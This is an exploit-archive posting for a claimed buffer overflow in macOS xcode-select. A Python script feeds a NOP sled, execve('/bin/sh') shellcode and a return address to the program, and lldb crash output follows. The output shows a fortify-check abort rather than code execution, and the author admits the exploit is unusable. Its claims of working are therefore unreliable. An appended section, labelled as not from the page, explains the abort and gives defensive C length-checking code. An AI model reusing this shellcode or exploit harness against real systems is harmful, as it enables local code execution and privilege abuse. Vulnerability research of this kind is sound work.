xcode-select 13.4.0 Buffer Overflow
Posted Sep 23, 2014
Authored by Juan Sacco

xcode-select on Darwin kernel version 13.4.0 suffers from a buffer overflow vulnerability.

tags | exploit, overflow, kernel
SHA-256 | 2cfb55fd81aab106c5b8d98a5ff07944ed05f81d33482b0074aa0884859772ad

# Exploit Title: xcode-select - buffer overflow
# Description: xcode-select controls the location of the developer
# directory used by xcrun(1), xcodebuild(1), cc(1), and other Xcode and BSD
# development tools.
# Date: Tuesday 23 2014
# Exploit Author: Juan Sacco
# Vendor Homepage: https://developer.apple.com
# Software Link: https://developer.apple.com/xcode/
# Version: 2333
# Tested on: 13.4.0 Darwin Kernel Version 13.4.0
# CVE : None

import errno
import subprocess

junk = "\x90"*5631
# OSX/x86 intel - execve(/bin/sh) - 24 bytes
shellcode = "\x31\xc0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x50\x53\xB0\x3B\x6A\x2A\xCD\x80"

buffer = "\x90\x90\x90\x90"*89
eip = "\x7f\xff\x8e\x19\x98\x66"

print "# xcode-select is prone to an overflow"
print "# Wasting CPU clocks on unusable exploits"
print "# This is exploit is for educational purposes"

# Hand the oversized string to xcode-select as its single argument
try:
    subprocess.call(["xcode-select", junk+shellcode+buffer+eip])
except OSError as e:
    if e.errno == errno.ENOENT:
        print "xcode-select not found!"
    else:
        print "Error executing exploit"
        raise

Process 5932 launched: '/usr/bin/xcode-select' (x86_64)
Process 5932 stopped
* thread #1: tid = 0x8358c, 0x00007fff8e199866
libsystem_kernel.dylib`__pthread_kill + 10, queue =
'com.apple.main-thread', stop reason = signal SIGABRT
frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8e199866: jae 0x7fff8e199870 ; __pthread_kill + 20
0x7fff8e199868: movq %rax, %rdi
0x7fff8e19986b: jmpq 0x7fff8e196175 ; cerror_nocancel
0x7fff8e199870: ret
(lldb)

(lldb) bt
* thread #1: tid = 0x8358c, 0x00007fff8e199866
libsystem_kernel.dylib`__pthread_kill + 10, queue =
'com.apple.main-thread', stop reason = signal SIGABRT
* frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
frame #1: 0x00007fff91b8a35c libsystem_pthread.dylib`pthread_kill + 92
frame #2: 0x00007fff8a0a7b1a libsystem_c.dylib`abort + 125
frame #3: 0x00007fff8a0a7c91 libsystem_c.dylib`abort_report_np + 181
frame #4: 0x00007fff8a0cb860 libsystem_c.dylib`__chk_fail + 48
frame #5: 0x00007fff8a0cb870 libsystem_c.dylib`__chk_fail_overlap + 16
frame #6: 0x00007fff8a0cb892 libsystem_c.dylib`__chk_overlap + 34
frame #7: 0x00007fff8a0cb795 libsystem_c.dylib`__strlcat_chk + 157
frame #8: 0x0000000100006315
libxcselect.dylib`xcselect_find_developer_contents_from_path + 116
frame #9: 0x0000000100000e75
xcode-select`___lldb_unnamed_function3$$xcode-select + 57
frame #10: 0x0000000100001562
xcode-select`___lldb_unnamed_function5$$xcode-select + 1083a

(lldb) register r -a
General Purpose Registers:
rax = 0x0000000000000000
rbx = 0x00007fff769df310 libsystem_pthread.dylib`_thread
rcx = 0x00007fff5fbfce18
rdx = 0x0000000000000000
rdi = 0x0000000000000d0b
rsi = 0x0000000000000006
rbp = 0x00007fff5fbfce40
rsp = 0x00007fff5fbfce18
r8 = 0x00000000fffffc00
r9 = 0x00007fff5fbfce00
r10 = 0x0000000008000000
r11 = 0x0000000000000206
r12 = 0x0000000000000400
r13 = 0x000000000000000e
r14 = 0x0000000000000006
r15 = 0x00007fff5fbfd120
rip = 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
rflags = 0x0000000000000206
cs = 0x0000000000000007
fs = 0x0000000000000000
gs = 0x0000000000030000
eax = 0x00000000
ebx = 0x769df310
ecx = 0x5fbfce18
edx = 0x00000000
edi = 0x00000d0b
esi = 0x00000006
ebp = 0x5fbfce40
esp = 0x5fbfce18
r8d = 0xfffffc00
r9d = 0x5fbfce00
r10d = 0x08000000
r11d = 0x00000206
r12d = 0x00000400
r13d = 0x0000000e
r14d = 0x00000006
r15d = 0x5fbfd120
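The backtrace above ends in libsystem_c's checked strlcat (`__strlcat_chk` → `__chk_overlap` → `__chk_fail` → `abort`), so the process dies with SIGABRT because the library's own runtime check fired while xcselect_find_developer_contents_from_path was appending the oversized argument into a fixed path buffer. As an added example that is not from the page or from Apple's code, the C below shows a path builder that validates the argument length before copying, so an oversized developer directory is rejected with an error code instead of reaching the abort path; the 1024-byte buffer size, the `/Contents/Developer` suffix and every function name here are assumptions.

```c
#include <stdlib.h>
#include <string.h>

/* 1024 is PATH_MAX on macOS; assumed size of xcode-select's path buffer (not from the page). */
#define DEVELOPER_PATH_MAX 1024

/* Portable BSD strlcat (glibc only gained one in 2.38), same contract as the
   libsystem_c strlcat behind __strlcat_chk: returns the length it tried to build. */
static size_t bsd_strlcat(char *dst, const char *src, size_t size)
{
    size_t dlen = 0, slen = strlen(src);
    while (dlen < size && dst[dlen] != '\0')
        dlen++;
    if (dlen == size)                   /* dst not terminated within size */
        return size + slen;
    size_t room = size - dlen - 1, n = slen < room ? slen : room;
    memcpy(dst + dlen, src, n);
    dst[dlen + n] = '\0';
    return dlen + slen;                 /* >= size means truncation */
}

/* Build "<developer_dir>/Contents/Developer" in out. Lengths are checked before
   anything is copied, so an oversized argument yields -1 instead of an abort(). */
int build_developer_contents_path(const char *developer_dir, char *out, size_t outsz)
{
    static const char suffix[] = "/Contents/Developer";
    size_t dlen = strlen(developer_dir);
    if (dlen == 0 || developer_dir[0] != '/')   /* must be an absolute path */
        return -1;
    if (dlen + sizeof suffix > outsz)             /* sizeof counts the NUL */
        return -1;
    out[0] = '\0';
    bsd_strlcat(out, developer_dir, outsz);
    bsd_strlcat(out, suffix, outsz);
    return 0;
}

/* Constructed input: an absolute path of len bytes, the shape of the 5631-byte
   argument the script above hands to xcode-select. Returns the build result. */
int probe_argument_of_length(size_t len)
{
    char out[DEVELOPER_PATH_MAX], *arg = malloc(len + 1);
    if (arg == NULL)
        return -1;
    memset(arg, 'A', len); arg[0] = '/'; arg[len] = '\0';
    int rc = build_developer_contents_path(arg, out, sizeof out);
    free(arg);
    return rc;
}
```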